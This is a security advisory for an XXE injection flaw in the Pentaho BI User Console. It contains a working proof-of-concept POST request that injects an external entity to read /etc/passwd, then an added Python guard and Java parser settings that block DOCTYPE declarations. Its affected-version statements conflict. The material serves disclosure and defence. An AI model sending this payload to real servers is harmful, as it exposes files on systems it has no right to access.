========================================================================
title: Pentaho User Console XML Injection Vulnerability
program: Pentaho BI User Console
vulnerable version: Pentaho < 4.5.0
homepage: http://www.pentaho.com/
Tested on: Linux x86/x86_64
found: Feb. 5 2014
Original Discovery by: Taylor Tippins
Exploit By: K.d Long [email protected]
========================================================================
Vendor description:
-------------------
The Pentaho Business Analytics suite manages Business Intelligence solutions, generates reports,
aggregates data, and provides users access to analysis views.
Vulnerability description:
--------------------------
The dashboardXml parameter is vulnerable to XML external entity injection. The tag <!DOCTYPE foo
[<!ENTITY xxe8295c SYSTEM "file:///etc/passwd"> ]> was injected into the XML of the client's POST
request. This tag defines an external entity, xxe8295c, which references a file on the XML parser's
filesystem. This entity was then used within a data field in the XML document. The server's response
contains the contents of the specified file, indicating that the parser processed the injected
external entity.
By manipulating the POST request to "/pentaho/content/dashboards" it is possible to inject arbitrary
XML declarations and tags. This request is triggered while a user is creating a customized dashboard.
Proof of concept:
-----------------
The following entity declaration creates a new XML entity holding the content of the /etc/passwd
file, which is then referenced from the XML request body below:
---cut here---
POST /pentaho/content/dashboards HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Referer: https://example.com/pentaho/content/dashboards?command=new
Cookie: loginNewWindowChecked=false; JSESSIONID=61448378278C147D05BC95BAB4B63F19
Content-Length: 2458
Connection: keep-alive
command=templatecontents&dashboardXml=<!DOCTYPE foo [<!ENTITY xxe8295c SYSTEM "file:///etc/passwd">
]><dashboard>
<title>New Dashboard</title>
<heading>New Dashboard</heading>
<enableWidgetPrinting>false</enableWidgetPrinting>
<documentation>
<author>test</author>
<description></description>
<icon></icon>
</documentation>
<template-ref>xul/04-1-then-2.xul&xxe8295c;</template-ref>
<theme-ref>00-Onyx</theme-ref>
<layout>
<overlay xmlns:pho="http://www.pentaho.com">
<box id="Panel_1" pho:title="Untitled 1" type="titled-panel" flex="1" collapsed="false" />
<box id="Panel_2" pho:title="Untitled 2" type="titled-panel" flex="1" collapsed="false" />
<box id="Panel_3" pho:title="Untitled 3" type="titled-panel" flex="1" collapsed="false" />
<box id="Panel_4" pho:title="Untitled 4" type="titled-panel" flex="1" collapsed="false" />
<box id="Panel_5" pho:title="Untitled 5"/>
<box id="Panel_6" pho:title="Untitled 6"/>
<box id="Panel_7" pho:title="Untitled 7"/>
<box id="Panel_8" pho:title="Untitled 8"/>
<box id="Panel_9" pho:title="Untitled 9"/>
<box id="Panel_10" pho:title="Untitled 10"/>
<box id="titlebar" title="" height="23" hidden="false" width="0" type="pagetitle" collapsed="false" />
<box id="widget-area" type="scrollarea"/>
<box id="widget-area" flex="1"/>
<box id="FilterPanel" title="" height="100" hidden="true" width="0" type="povpanel" collapsed="false" />
<box id="hbox1" type="layout"/>
<box id="hbox1" flex="1"/>
<box id="hbox2" type="layout"/>
<box id="hbox2" flex="1"/>
</overlay>
</layout>
<parameters>
</parameters>
<widgetJavascript><![CDATA[[]]]></widgetJavascript>
</dashboard>
&type=html
---cut here---
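The fix on the server side is to refuse any DTD in user-supplied XML, so that there is nothing an entity can be declared with. The following is an added example (not Pentaho's code and not part of the original advisory) showing that check in Python: a guard that rejects DOCTYPE/ENTITY declarations in a dashboardXml value before it reaches the parser, exercised against a constructed sample modelled on the request above and against a benign dashboard. The function names and the two sample documents are assumptions made for this example.

```python
import re
import xml.etree.ElementTree as ET

# Constructed sample modelled on the advisory's payload: a DOCTYPE that declares
# an external SYSTEM entity and references it inside <template-ref>.
MALICIOUS_DASHBOARD_XML = (
    '<!DOCTYPE foo [<!ENTITY xxe8295c SYSTEM "file:///etc/passwd"> ]>'
    '<dashboard><title>New Dashboard</title>'
    '<template-ref>xul/04-1-then-2.xul&xxe8295c;</template-ref>'
    '</dashboard>'
)

# Constructed benign sample: what a legitimate dashboard save looks like.
BENIGN_DASHBOARD_XML = (
    '<dashboard><title>New Dashboard</title>'
    '<template-ref>xul/04-1-then-2.xul</template-ref>'
    '</dashboard>'
)

# Match a DOCTYPE or ENTITY declaration anywhere in the document. Matching is
# case-insensitive and tolerates whitespace after "<!" so the check errs on
# the strict side rather than being bypassed by a slightly malformed prefix.
_DTD_MARKUP = re.compile(r"<!\s*(DOCTYPE|ENTITY)\b", re.IGNORECASE)


def has_dtd_markup(xml_text: str) -> bool:
    """Return True if the document carries a DOCTYPE or ENTITY declaration."""
    return _DTD_MARKUP.search(xml_text) is not None


def parse_dashboard_xml(xml_text: str) -> dict:
    """Parse a dashboardXml value, refusing anything that declares a DTD.

    Rejecting DOCTYPE outright is the standard XXE mitigation: without a DTD
    no external entity can be declared, so the parser can never be steered
    into reading a local file or fetching a URL on the attacker's behalf.
    """
    if has_dtd_markup(xml_text):
        raise ValueError("dashboardXml rejected: DOCTYPE/ENTITY declarations are not allowed")
    root = ET.fromstring(xml_text)
    if root.tag != "dashboard":
        raise ValueError("dashboardXml rejected: root element must be <dashboard>")
    return {
        "title": root.findtext("title", default=""),
        "template_ref": root.findtext("template-ref", default=""),
    }


def is_rejected(xml_text: str) -> bool:
    """Convenience wrapper: True when the guard refuses the document."""
    try:
        parse_dashboard_xml(xml_text)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    print("benign  ->", parse_dashboard_xml(BENIGN_DASHBOARD_XML))
    print("payload ->", "rejected" if is_rejected(MALICIOUS_DASHBOARD_XML) else "accepted")
```

Pentaho itself is a Java application; the equivalent hardening there is to set the `http://apache.org/xml/features/disallow-doctype-decl` feature to true on the `DocumentBuilderFactory` (or SAX parser) that handles the dashboard XML, which makes the parser raise on any DOCTYPE rather than relying on a pre-scan like the one above. A pre-scan is still useful as a request-level detection point: a dashboard save that carries a DOCTYPE is never legitimate for this endpoint and is worth logging as an attack attempt.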
Vulnerable versions:
--------------------
Pentaho User Console Release 4.5.0.GA.49857
Vendor contact timeline:
------------------------
02/16/2014: Vendor notified via email